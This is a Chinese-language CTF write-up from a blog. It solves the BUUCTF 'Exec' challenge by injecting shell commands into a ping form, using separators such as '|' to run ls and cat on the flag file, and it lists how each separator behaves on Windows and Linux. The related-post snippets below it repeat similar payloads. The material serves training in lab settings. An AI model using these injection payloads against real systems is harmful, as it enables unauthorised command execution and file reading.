buu web:Exec(命令执行)

最新推荐文章于 2024-05-31 10:45:49 发布
最新推荐文章于 2024-05-31 10:45:49 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: buuctf 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55378150/article/details/124005053
版权

打开靶机,看到是一个ping窗口,然后结合题目名Exec,基本可以确定是命令执行漏洞

先ping一下本地ip

 

正常回显,试一下命令执行,127.0.0.1 | ls

爆出当前目录下的index.php,然后通过目录穿越,找到了flag在这个目录下,127.0.0.1 | ls ../../../

然后直接127.0.0.1 | cat ../../../flag 

成功

相关知识点:

Windows:

&:前面语句为假时直接执行后面的命令

&&:前面的语句为假时直接出错,后面的命令不执行

|:直接执行后面的语句

||:前面的出错执行后面的语句 

Linux:

;:前面的执行完执行后面的

&:无论前面的语句真假都会执行

&&:只有前面为真才执行后面的

|:显示后面的执行结果

||:当前面的执行错误时执行后面的

m0_55378150
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记6】 buu [ACTF2020 新生赛]Exec
weixin_43553654的博客
05-07 306
打开看到这样一个界面,根据做题经验,这应该是一道考察命令执行的题,但是老套路,先看看源码里有什么 通过查看源码发现什么否没有那什么都说了,直接开始尝试首先因为是让你ping一个地址,这里我们尝试127.0.0.1 显示给127.0.0.1发送了对应数据包,说明ping命令执行成功了,那么我们是不是就可以利用“|”来连接另外一个命令执行从而得到flag,所以构造pa...
buucft web (exec)
a34376764的博客
03-20 570
一、解题 打开链接,发现是一道ping题,于是便输入本地IP127.0.0.1查看回显,发现回显正常。 然后便测试管道符合“|”是否可用并输入“127.0.0.1 | ls”来查看文件目录,结果发现管道符合“|”并未禁用且发现以下两个文件目录。 然后输入“127.0.0.1 | ls /”打开根目录。 在这其中发现flag文件,于是用“127.0.0.1&cat /flag”直接查看flag,发现成功并得到flag。 二、常用知识点 1、|(就是按位或),直接执行|后
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为三个,Bibi是制片人,Babidi是去除魔鬼印记的人,Buu成了魔鬼的名字。 以下是您将获得的其他功能的列表:-待办事项列表-设置您喜欢的壁纸-发现新的热点-书签-社交网络通知-每个新标签的高品质壁纸-时钟显示日期和时间-天气小部件-打开搜索 支持语言:English,中文 (简体),中文 (繁體)
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF[ACTF2020 新生赛]Exec
stars的博客
11-01 445
文章目录 打开连接发现网站有个ping功能,测试一下 考虑到这里会存在命令执行漏洞,利用它拿到flag 在这里补充一些相关的管道符 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 3、&(就是按位与),&前面和后面命令都要执行,无论前面真假 4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 5、;(linux下有的,和&一样的作用) 查看根目录发现f
BUU-WEB-Exec
qq_24033605的博客
04-30 214
页面功能只是常规的ping操作,查看源码未发现有什么过滤。 通过管道符进行多指令执行。 www.baidu.com | ls -a 通过管道符是可以执行指令的,所以直接尝试打开flag文件。 www.baidu.com | cat /flag flag{418216f7-b172-4331-9927-52bc34a623e1} ...
buu [ACTF2020 新生赛]Exec
qq_55777983的博客
08-21 148
这道题倒是很直白简单,基本上知道命令注入这个知识点就行 命令注入 127.0.0.1 || ls / 127.0.0.1 || ls /flag 127.0.0.1 || cat /flag
BUU 命令执行漏洞-[ACTF2020 新生赛]Exec
Ivyyyyyy1的博客
10-17 2539
一、题目 点开页面,经典的命令执行表单 先输入几个玩玩 都是正常回显,没啥怪东西 二、解题 1. 这里会用到 管道符 有关的知识点 ① | : 即按位或,会直接执行管道符之后的语句 ② || : 即逻辑或,若管道符前语句为true则只执行前一句,否则只执行后一句 ③ & : 即按位与,会直接执行前后两个语句 ④ && : 即逻辑与,若管道符前语句为true则执行两个语句,反之都不执行 2.在Linux命令中,ls 用于列出目录条目 那...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
Web安全之命令执行
weixin_43376075的博客
03-29 563
- Web安全之命令执行(Command Injection)
云演 Web题型 命令执行exec
cadandme的博客
01-18 623
云演 exec 提示命令执行exec 要求post传输一个ip值,尝试127.0.0.1,其回显为: 尝试进行管道命令执行 因为有长度限制,所以直接输入*.php,查看源码 查看路径,发现flag,查看flag
BUUCTF【WebExec命令执行漏洞)
qq_70434663的博客
03-02 979
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。
web安全-命令执行
qq_59350385的博客
02-23 3274
一、背景介绍 程序员使用脚本语言开发应用的过程中,脚本语言的开发十分快速,但是也伴随着一些问题。比如速度慢。如果我们开发的应用 ,特别是企业级的一些应用就需要去调用一些外部程序。当web应用需要调用一些外部程序是时就会用到一些执行系统命令的函数。 二、漏洞成因 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令执行,在没有过滤的情况下就会造成命令执行漏洞。 三、相关函数 system(args)有回显 ...
[ACTF2020 新生赛] web题-Exec
BROTHERYY的博客
07-08 469
//复现环境:buuoj.cn ping就完事 直接看看根目录有没有什么惊喜 cat /flag
BUUCTF刷题记录 Exec
m0_46576074的博客
05-11 402
[ACTF2020 新生赛]Exec 进入页面 首先 127.0.0.1;ls 进行目录读取,然后 127.0.0.1;cat /flag 得flag
【网络安全的神秘世界】docker搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 488
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。复制命令后,去kali安装。访问本地地址8080端口。
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值